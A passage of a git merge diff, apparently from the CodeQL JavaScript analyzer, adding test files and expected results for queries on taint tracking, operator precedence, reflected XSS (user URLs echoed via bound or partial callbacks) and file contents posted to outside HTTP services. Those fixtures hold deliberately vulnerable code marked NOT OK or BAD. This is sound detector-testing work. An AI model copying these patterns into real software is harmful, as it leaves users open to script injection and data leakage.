Merge remote-tracking branch 'upstream/master' into mergeback-2018-10-08

2026-05-02 04:05:14 +02:00 · 2018-10-08 11:48:56 +02:00
parent 989a82fd1e 799c034a5e
commit 49644bfb47
151 changed files with 5884 additions and 546 deletions
--- a/javascript/ql/test/library-tests/EmailClients/EmailClients.expected
+++ b/javascript/ql/test/library-tests/EmailClients/EmailClients.expected
@@ -0,0 +1 @@
+| tst.js:17:2:19:3 | transpo ... ');\\n\\t}) | tst.js:11:12:11:31 | 'sender@example.com' | tst.js:12:10:12:55 | 'receiv ... le.com' | tst.js:13:15:13:28 | 'Some subject' | tst.js:14:12:14:15 | 'Hi' | tst.js:15:12:15:22 | '<b>Hi</b>' |
--- a/javascript/ql/test/library-tests/EmailClients/EmailClients.ql
+++ b/javascript/ql/test/library-tests/EmailClients/EmailClients.ql
@@ -0,0 +1,4 @@
+import javascript
+
+from EmailSender send
+select send, send.getFrom(), send.getTo(), send.getSubject(), send.getPlainTextBody(), send.getHtmlBody()
--- a/javascript/ql/test/library-tests/EmailClients/tst.js
+++ b/javascript/ql/test/library-tests/EmailClients/tst.js
@@ -0,0 +1,20 @@
+let nodemailer = require('nodemailer');
+let config = require('./account-config');
+
+function sendMessage() {
+	let transporter = nodemailer.createTransport({
+	    host: config.host,
+	    port: config.host,
+	    auth: config.auth
+	});
+	let mailOptions = {
+	    from: 'sender@example.com',
+	    to: 'receiver1@example.com, receiver2@example.com',
+	    subject: 'Some subject',
+	    text: 'Hi',
+	    html: '<b>Hi</b>'
+	};
+	transporter.sendMail(mailOptions, (error, info) => {
+	    console.log('Message sent');
+	});
+}
--- a/javascript/ql/test/library-tests/Flow/AbstractValues.expected
+++ b/javascript/ql/test/library-tests/Flow/AbstractValues.expected
@@ -180,6 +180,10 @@
 | n.js:3:16:3:23 | object literal |
 | namespace-reexport.js:1:1:4:0 | exports object of module namespace-reexport |
 | namespace-reexport.js:1:1:4:0 | module object of module namespace-reexport |
+| nestedImport.js:1:1:13:0 | exports object of module nestedImport |
+| nestedImport.js:1:1:13:0 | module object of module nestedImport |
+| nestedImport.js:9:1:12:1 | function tst |
+| nestedImport.js:9:1:12:1 | instance of function tst |
 | nodeJsClient.js:1:1:6:0 | exports object of module nodeJsClient |
 | nodeJsClient.js:1:1:6:0 | module object of module nodeJsClient |
 | nodeJsLib.js:1:1:4:0 | exports object of module nodeJsLib |
--- a/javascript/ql/test/library-tests/Flow/abseval.expected
+++ b/javascript/ql/test/library-tests/Flow/abseval.expected
@@ -54,6 +54,7 @@
 | b.js:42:5:42:7 | z11 | b.js:42:11:42:18 | toString | file://:0:0:0:0 | indefinite value (import) |
 | b.js:45:5:45:7 | z12 | b.js:45:11:45:12 | f2 | ts2.ts:1:1:6:0 | exports object of module ts2 |
 | b.js:45:5:45:7 | z12 | b.js:45:11:45:12 | f2 | ts2.ts:1:10:1:22 | anonymous function |
+| b.js:45:5:45:7 | z12 | b.js:45:11:45:12 | f2 | ts2.ts:4:12:4:13 | object literal |
 | b.js:48:5:48:7 | z13 | b.js:48:11:48:11 | w | file://:0:0:0:0 | non-empty, non-numeric string |
 | b.js:51:5:51:7 | z14 | b.js:51:11:51:24 | foo_reexported | file://:0:0:0:0 | indefinite value (import) |
 | b.js:54:5:54:7 | z15 | b.js:54:11:54:19 | something | file://:0:0:0:0 | indefinite value (import) |
@@ -171,6 +172,10 @@
 | mixed.js:9:5:9:6 | fn | mixed.js:9:10:9:19 | __filename | file://:0:0:0:0 | numeric string |
 | mixed.js:10:5:10:6 | dn | mixed.js:10:10:10:18 | __dirname | file://:0:0:0:0 | non-empty, non-numeric string |
 | mixed.js:10:5:10:6 | dn | mixed.js:10:10:10:18 | __dirname | file://:0:0:0:0 | numeric string |
+| nestedImport.js:2:5:2:6 | x1 | nestedImport.js:2:10:2:12 | foo | esLib.js:3:8:3:24 | function foo |
+| nestedImport.js:6:7:6:8 | x2 | nestedImport.js:6:12:6:14 | foo | file://:0:0:0:0 | indefinite value (import) |
+| nestedImport.js:6:7:6:8 | x2 | nestedImport.js:6:12:6:14 | foo | nodeJsLib.js:3:15:3:37 | function nodeJsFoo |
+| nestedImport.js:11:7:11:8 | x3 | nestedImport.js:11:12:11:14 | foo | esLib.js:3:8:3:24 | function foo |
 | nodeJsClient.js:1:5:1:6 | nj | nodeJsClient.js:1:10:1:31 | require ... JsLib') | file://:0:0:0:0 | indefinite value (call) |
 | nodeJsClient.js:1:5:1:6 | nj | nodeJsClient.js:1:10:1:31 | require ... JsLib') | nodeJsLib.js:1:1:4:0 | exports object of module nodeJsLib |
 | nodeJsClient.js:1:5:1:6 | nj | nodeJsClient.js:1:10:1:31 | require ... JsLib') | nodeJsLib.js:1:18:1:43 | function nodeJsModule |
--- a/javascript/ql/test/library-tests/Flow/nestedImport.js
+++ b/javascript/ql/test/library-tests/Flow/nestedImport.js
@@ -0,0 +1,12 @@
+import { foo } from './esLib';
+let x1 = foo;
+
+if (!foo) {
+  import { foo } from './nodeJsLib';
+  let x2 = foo;
+}
+
+function tst() {
+  import { foo } from './esLib';
+  let x3 = foo;
+}
--- a/javascript/ql/test/library-tests/Flow/types.expected
+++ b/javascript/ql/test/library-tests/Flow/types.expected
@@ -98,6 +98,9 @@
 | mixed.js:8:5:8:7 | exp | mixed.js:8:11:8:17 | exports | object |
 | mixed.js:9:5:9:6 | fn | mixed.js:9:10:9:19 | __filename | string |
 | mixed.js:10:5:10:6 | dn | mixed.js:10:10:10:18 | __dirname | string |
+| nestedImport.js:2:5:2:6 | x1 | nestedImport.js:2:10:2:12 | foo | function |
+| nestedImport.js:6:7:6:8 | x2 | nestedImport.js:6:12:6:14 | foo | boolean, class, date, function, null, number, object, regular expression,string or undefined |
+| nestedImport.js:11:7:11:8 | x3 | nestedImport.js:11:12:11:14 | foo | function |
 | nodeJsClient.js:1:5:1:6 | nj | nodeJsClient.js:1:10:1:31 | require ... JsLib') | boolean, class, date, function, null, number, object, regular expression,string or undefined |
 | nodeJsClient.js:2:5:2:6 | es | nodeJsClient.js:2:10:2:27 | require('./esLib') | boolean, class, date, function, null, number, object, regular expression,string or undefined |
 | nodeJsClient.js:4:5:4:6 | x1 | nodeJsClient.js:4:10:4:15 | nj.foo | boolean, class, date, function, null, number, object, regular expression,string or undefined |
--- a/javascript/ql/test/library-tests/TaintTracking/BasicTaintTracking.expected
+++ b/javascript/ql/test/library-tests/TaintTracking/BasicTaintTracking.expected
@@ -1,3 +1,8 @@
+| partialCalls.js:4:17:4:24 | source() | partialCalls.js:17:14:17:14 | x |
+| partialCalls.js:4:17:4:24 | source() | partialCalls.js:20:14:20:14 | y |
+| partialCalls.js:4:17:4:24 | source() | partialCalls.js:30:14:30:20 | x.value |
+| partialCalls.js:4:17:4:24 | source() | partialCalls.js:41:10:41:18 | id(taint) |
+| partialCalls.js:4:17:4:24 | source() | partialCalls.js:51:14:51:14 | x |
 | tst.js:2:13:2:20 | source() | tst.js:4:10:4:10 | x |
 | tst.js:2:13:2:20 | source() | tst.js:5:10:5:22 | "/" + x + "!" |
 | tst.js:2:13:2:20 | source() | tst.js:14:10:14:17 | x.sort() |
--- a/javascript/ql/test/library-tests/TaintTracking/partialCalls.js
+++ b/javascript/ql/test/library-tests/TaintTracking/partialCalls.js
@@ -0,0 +1,58 @@
+let R = require('ramda');
+
+function test() {
+    let taint = source();
+
+    function safe1(x, y) {
+        sink(x); // OK - x is not tainted
+    }
+    function safe2(x, y) {
+        sink(y); // OK - y is not tainted
+    }
+
+    safe1.bind(null, "hello", taint)();
+    safe2.bind(null, taint, "hello")();
+
+    function unsafe1(x, y) {
+        sink(x); // NOT OK - x is tainted
+    }
+    function unsafe2(x ,y) {
+        sink(y); // NOT OK - y is tainted
+    }
+
+    unsafe1.bind(null, taint, "hello")();
+    unsafe2.bind(null, "hello", taint)();
+
+    function safeprop(x) {
+        sink(x.value); // OK - property `value` is not tainted
+    }
+    function unsafeprop(x) {
+        sink(x.value); // NOT OK - property `value` is tainted
+    }
+
+    safeprop.bind(null, {value: "hello", somethingElse: taint})();
+    unsafeprop.bind(null, {value: taint, somethingElse: "hello"})();
+
+    function id(x) {
+        return x;
+    }
+
+    sink(id("hello")); // OK
+    sink(id(taint));   // NOT OK
+
+    let taintGetter = id.bind(null, taint);
+    sink(taintGetter);   // OK - this is a function object
+    sink(taintGetter()); // NOT OK - but not currently detected
+
+    function safearray(x) {
+        sink(x); // OK
+    }
+    function unsafearray(x) {
+        sink(x); // NOT OK
+    }
+
+    let xs = ["hello"];
+    let ys = [taint];
+    R.partial(safearray, xs)();
+    R.partial(unsafearray, ys)();
+}
--- a/javascript/ql/test/library-tests/frameworks/Express/HeaderAccess.expected
+++ b/javascript/ql/test/library-tests/frameworks/Express/HeaderAccess.expected
@@ -0,0 +1,5 @@
+| src/express.js:28:3:28:16 | req.get("foo") | foo |
+| src/express.js:29:3:29:19 | req.header("bar") | bar |
+| src/express.js:47:3:47:17 | req.headers.baz | baz |
+| src/express.js:48:3:48:10 | req.host | host |
+| src/express.js:49:3:49:14 | req.hostname | host |
--- a/javascript/ql/test/library-tests/frameworks/Express/HeaderAccess.ql
+++ b/javascript/ql/test/library-tests/frameworks/Express/HeaderAccess.ql
@@ -0,0 +1,4 @@
+import javascript
+
+from HTTP::RequestHeaderAccess access
+select access, access.getAHeaderName()
--- a/javascript/ql/test/library-tests/frameworks/NodeJSLib/HeaderAccess.expected
+++ b/javascript/ql/test/library-tests/frameworks/NodeJSLib/HeaderAccess.expected
@@ -0,0 +1,2 @@
+| src/http.js:9:3:9:17 | req.headers.foo | foo |
+| src/https.js:9:3:9:17 | req.headers.foo | foo |
--- a/javascript/ql/test/library-tests/frameworks/NodeJSLib/HeaderAccess.ql
+++ b/javascript/ql/test/library-tests/frameworks/NodeJSLib/HeaderAccess.ql
@@ -0,0 +1,4 @@
+import javascript
+
+from HTTP::RequestHeaderAccess access
+select access, access.getAHeaderName()
--- a/javascript/ql/test/library-tests/frameworks/hapi/HeaderAccess.expected
+++ b/javascript/ql/test/library-tests/frameworks/hapi/HeaderAccess.expected
@@ -0,0 +1 @@
+| src/hapi.js:25:3:25:21 | request.headers.baz | baz |
--- a/javascript/ql/test/library-tests/frameworks/hapi/HeaderAccess.ql
+++ b/javascript/ql/test/library-tests/frameworks/hapi/HeaderAccess.ql
@@ -0,0 +1,4 @@
+import javascript
+
+from HTTP::RequestHeaderAccess access
+select access, access.getAHeaderName()
--- a/javascript/ql/test/library-tests/frameworks/koa/HeaderAccess.expected
+++ b/javascript/ql/test/library-tests/frameworks/koa/HeaderAccess.expected
@@ -0,0 +1,3 @@
+| src/koa.js:24:3:24:24 | ctx.req ... der.bar | bar |
+| src/koa.js:25:3:25:25 | ctx.req ... ers.bar | bar |
+| src/koa.js:26:3:26:24 | ctx.req ... ('bar') | bar |
--- a/javascript/ql/test/library-tests/frameworks/koa/HeaderAccess.ql
+++ b/javascript/ql/test/library-tests/frameworks/koa/HeaderAccess.ql
@@ -0,0 +1,4 @@
+import javascript
+
+from HTTP::RequestHeaderAccess access
+select access, access.getAHeaderName()
--- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst.js
+++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst.js
@@ -141,4 +141,15 @@ function v() {
  x = 23;
  x = 42;
  return x;
-}
+}
+
+(function(){
+	var x = (void 0);
+	var y = ((void 0));
+	var z1 = z2 = (void 0);
+	x = 42;
+	y = 42;
+	z1 = 42;
+	z2 = 42;
+	return x + y + z1 + z2;
+});
--- a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/UnclearOperatorPrecedence.expected
+++ b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/UnclearOperatorPrecedence.expected
@@ -0,0 +1,3 @@
+| tst.js:1:9:1:17 | 0x0A != 0 | The '!=' operator binds more tightly than '&', which may not be obvious in this case. |
+| tst.js:6:1:6:7 | x !== y | The '!==' operator binds more tightly than '&', which may not be obvious in this case. |
+| tst.js:10:3:10:6 | b==c | The '==' operator binds more tightly than '&', which may not be obvious in this case. |
--- a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/UnclearOperatorPrecedence.qlref
+++ b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/UnclearOperatorPrecedence.qlref
@@ -0,0 +1 @@
+Expressions/UnclearOperatorPrecedence.ql
--- a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.js
+++ b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.js
@@ -0,0 +1,10 @@
+x.f() & 0x0A != 0;   // NOT OK
+x.f() & (0x0A != 0); // OK
+x.f()  &  0x0A != 0; // OK
+x.f() & 0x0A!=0;     // OK
+
+x !== y & 1;         // NOT OK
+
+x > 0 & x < 10;      // OK
+
+a&b==c;          // NOT OK
--- a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.min.js
+++ b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.min.js
@@ -0,0 +1 @@
+a&b==c; // OK (minified file)
--- a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.expected
+++ b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.expected
@@ -1,2 +1,3 @@
 | tst.js:2:9:2:16 | x + x>>1 | Whitespace around nested operators contradicts precedence. |
 | tst.js:42:9:42:20 | p in o&&o[p] | Whitespace around nested operators contradicts precedence. |
+| tst.js:49:1:49:12 | x  +  x >> 1 | Whitespace around nested operators contradicts precedence. |
--- a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js
+++ b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js
@@ -44,3 +44,9 @@ function ok10(o, p) {

 // OK
 x==y ** 2;
+
+// NOT OK
+x  +  x >> 1
+
+// OK
+x +   x >> 1
--- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss.expected
+++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss.expected
@@ -2,6 +2,10 @@
 | etherpad.js:11:12:11:19 | response | Cross-site scripting vulnerability due to $@. | etherpad.js:9:16:9:30 | req.query.jsonp | user-provided value |
 | formatting.js:6:14:6:47 | util.fo ... , evil) | Cross-site scripting vulnerability due to $@. | formatting.js:4:16:4:29 | req.query.evil | user-provided value |
 | formatting.js:7:14:7:53 | require ... , evil) | Cross-site scripting vulnerability due to $@. | formatting.js:4:16:4:29 | req.query.evil | user-provided value |
+| partial.js:10:14:10:18 | x + y | Cross-site scripting vulnerability due to $@. | partial.js:13:42:13:48 | req.url | user-provided value |
+| partial.js:19:14:19:18 | x + y | Cross-site scripting vulnerability due to $@. | partial.js:22:52:22:58 | req.url | user-provided value |
+| partial.js:28:14:28:18 | x + y | Cross-site scripting vulnerability due to $@. | partial.js:31:48:31:54 | req.url | user-provided value |
+| partial.js:37:14:37:18 | x + y | Cross-site scripting vulnerability due to $@. | partial.js:40:43:40:49 | req.url | user-provided value |
 | promises.js:6:25:6:25 | x | Cross-site scripting vulnerability due to $@. | promises.js:5:44:5:57 | req.query.data | user-provided value |
 | tst2.js:7:12:7:12 | p | Cross-site scripting vulnerability due to $@. | tst2.js:6:9:6:9 | p | user-provided value |
 | tst2.js:8:12:8:12 | r | Cross-site scripting vulnerability due to $@. | tst2.js:6:12:6:15 | q: r | user-provided value |
--- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXssPath.expected
+++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXssPath.expected
@@ -11,6 +11,18 @@ edges
 | formatting.js:4:16:4:29 | req.query.evil | formatting.js:4:9:4:29 | evil |
 | formatting.js:6:43:6:46 | evil | formatting.js:6:14:6:47 | util.fo ... , evil) |
 | formatting.js:7:49:7:52 | evil | formatting.js:7:14:7:53 | require ... , evil) |
+| partial.js:9:25:9:25 | x | partial.js:10:14:10:14 | x |
+| partial.js:10:14:10:14 | x | partial.js:10:14:10:18 | x + y |
+| partial.js:13:42:13:48 | req.url | partial.js:9:25:9:25 | x |
+| partial.js:18:25:18:25 | x | partial.js:19:14:19:14 | x |
+| partial.js:19:14:19:14 | x | partial.js:19:14:19:18 | x + y |
+| partial.js:22:52:22:58 | req.url | partial.js:18:25:18:25 | x |
+| partial.js:27:25:27:25 | x | partial.js:28:14:28:14 | x |
+| partial.js:28:14:28:14 | x | partial.js:28:14:28:18 | x + y |
+| partial.js:31:48:31:54 | req.url | partial.js:27:25:27:25 | x |
+| partial.js:36:25:36:25 | x | partial.js:37:14:37:14 | x |
+| partial.js:37:14:37:14 | x | partial.js:37:14:37:18 | x + y |
+| partial.js:40:43:40:49 | req.url | partial.js:36:25:36:25 | x |
 | promises.js:5:3:5:59 | new Pro ... .data)) | promises.js:6:11:6:11 | x |
 | promises.js:5:44:5:57 | req.query.data | promises.js:5:3:5:59 | new Pro ... .data)) |
 | promises.js:5:44:5:57 | req.query.data | promises.js:6:11:6:11 | x |
@@ -25,6 +37,10 @@ edges
 | etherpad.js:11:12:11:19 | response | etherpad.js:9:16:9:30 | req.query.jsonp | etherpad.js:11:12:11:19 | response | Cross-site scripting vulnerability due to $@. | etherpad.js:9:16:9:30 | req.query.jsonp | user-provided value |
 | formatting.js:6:14:6:47 | util.fo ... , evil) | formatting.js:4:16:4:29 | req.query.evil | formatting.js:6:14:6:47 | util.fo ... , evil) | Cross-site scripting vulnerability due to $@. | formatting.js:4:16:4:29 | req.query.evil | user-provided value |
 | formatting.js:7:14:7:53 | require ... , evil) | formatting.js:4:16:4:29 | req.query.evil | formatting.js:7:14:7:53 | require ... , evil) | Cross-site scripting vulnerability due to $@. | formatting.js:4:16:4:29 | req.query.evil | user-provided value |
+| partial.js:10:14:10:18 | x + y | partial.js:13:42:13:48 | req.url | partial.js:10:14:10:18 | x + y | Cross-site scripting vulnerability due to $@. | partial.js:13:42:13:48 | req.url | user-provided value |
+| partial.js:19:14:19:18 | x + y | partial.js:22:52:22:58 | req.url | partial.js:19:14:19:18 | x + y | Cross-site scripting vulnerability due to $@. | partial.js:22:52:22:58 | req.url | user-provided value |
+| partial.js:28:14:28:18 | x + y | partial.js:31:48:31:54 | req.url | partial.js:28:14:28:18 | x + y | Cross-site scripting vulnerability due to $@. | partial.js:31:48:31:54 | req.url | user-provided value |
+| partial.js:37:14:37:18 | x + y | partial.js:40:43:40:49 | req.url | partial.js:37:14:37:18 | x + y | Cross-site scripting vulnerability due to $@. | partial.js:40:43:40:49 | req.url | user-provided value |
 | promises.js:6:25:6:25 | x | promises.js:5:44:5:57 | req.query.data | promises.js:6:25:6:25 | x | Cross-site scripting vulnerability due to $@. | promises.js:5:44:5:57 | req.query.data | user-provided value |
 | promises.js:6:25:6:25 | x | promises.js:5:44:5:57 | req.query.data | promises.js:6:25:6:25 | x | Cross-site scripting vulnerability due to $@. | promises.js:5:44:5:57 | req.query.data | user-provided value |
 | tst2.js:7:12:7:12 | p | tst2.js:6:9:6:9 | p | tst2.js:7:12:7:12 | p | Cross-site scripting vulnerability due to $@. | tst2.js:6:9:6:9 | p | user-provided value |
--- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXssWithCustomSanitizer.expected
+++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXssWithCustomSanitizer.expected
@@ -1,6 +1,10 @@
 | ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:8:33:8:45 | req.params.id | user-provided value |
 | formatting.js:6:14:6:47 | util.fo ... , evil) | Cross-site scripting vulnerability due to $@. | formatting.js:4:16:4:29 | req.query.evil | user-provided value |
 | formatting.js:7:14:7:53 | require ... , evil) | Cross-site scripting vulnerability due to $@. | formatting.js:4:16:4:29 | req.query.evil | user-provided value |
+| partial.js:10:14:10:18 | x + y | Cross-site scripting vulnerability due to $@. | partial.js:13:42:13:48 | req.url | user-provided value |
+| partial.js:19:14:19:18 | x + y | Cross-site scripting vulnerability due to $@. | partial.js:22:52:22:58 | req.url | user-provided value |
+| partial.js:28:14:28:18 | x + y | Cross-site scripting vulnerability due to $@. | partial.js:31:48:31:54 | req.url | user-provided value |
+| partial.js:37:14:37:18 | x + y | Cross-site scripting vulnerability due to $@. | partial.js:40:43:40:49 | req.url | user-provided value |
 | promises.js:6:25:6:25 | x | Cross-site scripting vulnerability due to $@. | promises.js:5:44:5:57 | req.query.data | user-provided value |
 | tst2.js:7:12:7:12 | p | Cross-site scripting vulnerability due to $@. | tst2.js:6:9:6:9 | p | user-provided value |
 | tst2.js:8:12:8:12 | r | Cross-site scripting vulnerability due to $@. | tst2.js:6:12:6:15 | q: r | user-provided value |
--- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXssWithCustomSanitizer_old.expected
+++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXssWithCustomSanitizer_old.expected
@@ -5,6 +5,10 @@ WARNING: Type XssDataFlowConfiguration has been deprecated and may be removed in
 | ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:8:33:8:45 | req.params.id | user-provided value |
 | formatting.js:6:14:6:47 | util.fo ... , evil) | Cross-site scripting vulnerability due to $@. | formatting.js:4:16:4:29 | req.query.evil | user-provided value |
 | formatting.js:7:14:7:53 | require ... , evil) | Cross-site scripting vulnerability due to $@. | formatting.js:4:16:4:29 | req.query.evil | user-provided value |
+| partial.js:10:14:10:18 | x + y | Cross-site scripting vulnerability due to $@. | partial.js:13:42:13:48 | req.url | user-provided value |
+| partial.js:19:14:19:18 | x + y | Cross-site scripting vulnerability due to $@. | partial.js:22:52:22:58 | req.url | user-provided value |
+| partial.js:28:14:28:18 | x + y | Cross-site scripting vulnerability due to $@. | partial.js:31:48:31:54 | req.url | user-provided value |
+| partial.js:37:14:37:18 | x + y | Cross-site scripting vulnerability due to $@. | partial.js:40:43:40:49 | req.url | user-provided value |
 | promises.js:6:25:6:25 | x | Cross-site scripting vulnerability due to $@. | promises.js:5:44:5:57 | req.query.data | user-provided value |
 | tst2.js:7:12:7:12 | p | Cross-site scripting vulnerability due to $@. | tst2.js:6:9:6:9 | p | user-provided value |
 | tst2.js:8:12:8:12 | r | Cross-site scripting vulnerability due to $@. | tst2.js:6:12:6:15 | q: r | user-provided value |
--- a/javascript/ql/test/query-tests/Security/CWE-079/partial.js
+++ b/javascript/ql/test/query-tests/Security/CWE-079/partial.js
@@ -0,0 +1,55 @@
+let express = require('express');
+let underscore = require('underscore');
+let lodash = require('lodash');
+let R = require('ramda');
+
+let app = express();
+
+app.get("/some/path", (req, res) => {
+  function sendResponse(x, y) {
+    res.send(x + y); // NOT OK
+  }
+  
+  let callback = sendResponse.bind(null, req.url);
+  [1, 2, 3].forEach(callback);
+});
+
+app.get("/underscore", (req, res) => {
+  function sendResponse(x, y) {
+    res.send(x + y); // NOT OK
+  }
+  
+  let callback = underscore.partial(sendResponse, [req.url]);
+  [1, 2, 3].forEach(callback);
+});
+
+app.get("/lodash", (req, res) => {
+  function sendResponse(x, y) {
+    res.send(x + y); // NOT OK
+  }
+  
+  let callback = lodash.partial(sendResponse, [req.url]);
+  [1, 2, 3].forEach(callback);
+});
+
+app.get("/ramda", (req, res) => {
+  function sendResponse(x, y) {
+    res.send(x + y); // NOT OK
+  }
+  
+  let callback = R.partial(sendResponse, [req.url]);
+  [1, 2, 3].forEach(callback);
+});
+
+app.get("/return", (req, res) => {
+  function getFirst(x, y) {
+    return x;
+  }
+
+  let callback = getFirst.bind(null, req.url);
+
+  res.send(callback);   // OK - the callback itself is not tainted
+  res.send(callback()); // NOT OK - but not currently detected
+
+  res.send(getFirst("Hello")); // OK - argument is not tainted from this call site
+});
--- a/javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.expected
+++ b/javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.expected
@@ -0,0 +1,8 @@
+| bufferRead.js:12:22:12:43 | new Buf ... s.size) | $@ flows directly to Http request body | bufferRead.js:33:21:33:28 | postData | File access |
+| googlecompiler.js:44:54:44:57 | data | $@ flows directly to Http request body | googlecompiler.js:38:18:38:26 | post_data | File access |
+| readFileSync.js:5:12:5:39 | fs.read ... t.txt") | $@ flows directly to Http request body | readFileSync.js:26:18:26:18 | s | File access |
+| readStreamRead.js:13:21:13:35 | readable.read() | $@ flows directly to Http request body | readStreamRead.js:30:19:30:23 | chunk | File access |
+| request.js:28:52:28:55 | data | $@ flows directly to Http request body | request.js:8:11:8:20 | {jsonData} | File access |
+| request.js:43:51:43:54 | data | $@ flows directly to Http request body | request.js:16:11:23:3 | {\\n    u ... ody\\n  } | File access |
+| sentAsHeaders.js:10:79:10:84 | buffer | $@ flows directly to Http request body | sentAsHeaders.js:14:20:19:9 | {\\n      ...       } | File access |
+| sentAsHeaders.js:10:79:10:84 | buffer | $@ flows directly to Http request body | sentAsHeaders.js:20:20:25:9 | {\\n      ...       } | File access |
--- a/javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.qlref
+++ b/javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.qlref
@@ -0,0 +1 @@
+Security/CWE-200/FileAccessToHttp.ql
--- a/javascript/ql/test/query-tests/Security/CWE-200/bufferRead.js
+++ b/javascript/ql/test/query-tests/Security/CWE-200/bufferRead.js
@@ -0,0 +1,41 @@
+// adopted from https://stackoverflow.com/questions/36771266/what-is-the-use-of-fd-file-descriptor-in-node-js
+
+const fs = require('fs');
+var http = require('http');
+
+var fileName = "foo.txt";
+
+fs.exists(fileName, function (exists) {
+   if (exists) {
+    fs.stat(fileName, function (error, stats) {
+      fs.open(fileName, "r", function (error, fd) {
+        var buffer = new Buffer(stats.size);
+        fs.read(fd, buffer, 0, buffer.length, null, function (error, bytesRead) {
+
+          var postData = buffer.toString("utf8", 0, bytesRead);
+
+          const options = {
+            hostname: 'www.google.com',
+            port: 80,
+            path: '/upload',
+            method: 'POST',
+            headers: {
+              'Content-Type': 'application/x-www-form-urlencoded',
+              'Content-Length': Buffer.byteLength(postData)
+            }
+          };
+
+          const req = http.request(options, (res) => {
+            res.setEncoding('utf8');
+          });
+
+          // BAD: write data from file to request body
+          req.write(postData);
+          req.end(); 
+          });
+
+          fs.close(fd);
+        });
+    });
+  }
+});
--- a/javascript/ql/test/query-tests/Security/CWE-200/externs/fs.js
+++ b/javascript/ql/test/query-tests/Security/CWE-200/externs/fs.js
--- a/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js
+++ b/javascript/ql/test/query-tests/Security/CWE-200/googlecompiler.js
@@ -0,0 +1,62 @@
+// adopted from https://stackoverflow.com/questions/6158933/how-to-make-an-http-post-request-in-node-js
+
+var querystring = require('querystring');
+var http = require('http');
+var fs = require('fs');
+
+function PostCode(codestring) {
+  // Build the post string from an object
+  var post_data = querystring.stringify({
+      'compilation_level' : 'ADVANCED_OPTIMIZATIONS',
+      'output_format': 'json',
+      'output_info': 'compiled_code',
+        'warning_level' : 'QUIET',
+        'js_code' : codestring // BAD: passing data from file to the request json body
+  });
+
+  // An object of options to indicate where to post to
+  var post_options = {
+      host: 'closure-compiler.appspot.com',
+      port: '80',
+      path: '/compile',
+      method: 'POST',
+      headers: {
+          'Content-Type': 'application/x-www-form-urlencoded',
+          'Content-Length': Buffer.byteLength(post_data)
+      }
+  };
+
+  // Set up the request
+  var post_req = http.request(post_options, function(res) {
+      res.setEncoding('utf8');
+      res.on('data', function (chunk) {
+          console.log('Response: ' + chunk);
+      });
+  });
+
+  // BAD: post the data from file to request body
+  post_req.write(post_data);
+  post_req.end();
+
+}
+
+// This is an async file read
+fs.readFile('LinkedList.js', 'utf-8', function (err, data) {
+  if (err) {
+    // If this were just a small part of the application, you would
+    // want to handle this differently, maybe throwing an exception
+    // for the caller to handle. Since the file is absolutely essential
+    // to the program's functionality, we're going to exit with a fatal
+    // error instead.
+    console.log("FATAL An error occurred trying to read in the file: " + err);
+    process.exit(-2);
+  }
+  // Make sure there's data before we post it
+  if(data) {
+    PostCode(data);
+  }
+  else {
+    console.log("No data to post");
+    process.exit(-1);
+  }
+});
--- a/javascript/ql/test/query-tests/Security/CWE-200/readFileSync.js
+++ b/javascript/ql/test/query-tests/Security/CWE-200/readFileSync.js
@@ -0,0 +1,29 @@
+// adopted from https://stackoverflow.com/questions/6158933/how-to-make-an-http-post-request-in-node-js
+
+var fs = require("fs");
+var http = require("http");
+let data = fs.readFileSync("input.txt");
+try {
+  let s = data.toString();
+  // An object of options to indicate where to post to
+  var post_options = {
+      host: 'closure-compiler.appspot.com',
+      port: '80',
+      path: '/compile',
+      method: 'POST',
+      headers: {
+          'Content-Type': 'application/x-www-form-urlencoded',
+          'Content-Length': Buffer.byteLength(s) 
+      }
+  };
+
+  // Set up the request
+  var post_req = http.request(post_options, function(res) {
+      res.setEncoding('utf8');
+  });
+
+  // BAD: post the data from file to request body
+  post_req.write(s);
+  post_req.end();
+} catch (e) {
+}
--- a/javascript/ql/test/query-tests/Security/CWE-200/readStreamRead.js
+++ b/javascript/ql/test/query-tests/Security/CWE-200/readStreamRead.js
@@ -0,0 +1,38 @@
+// adopted from https://stackoverflow.com/questions/6158933/how-to-make-an-http-post-request-in-node-js
+
+const fs = require('fs');
+var http = require('http');
+
+var fileName = "foo.txt";
+
+fs.exists(fileName, function (exists) {
+   if (exists) {
+    fs.stat(fileName, function (error, stats) {
+      var readable = fs.createReadStream(fileName);
+      readable.on('readable', () => {
+        let chunk = readable.read();
+
+        const options = {
+          hostname: 'www.google.com',
+          port: 80,
+          path: '/upload',
+          method: 'POST',
+          headers: {
+            'Content-Type': 'application/x-www-form-urlencoded',
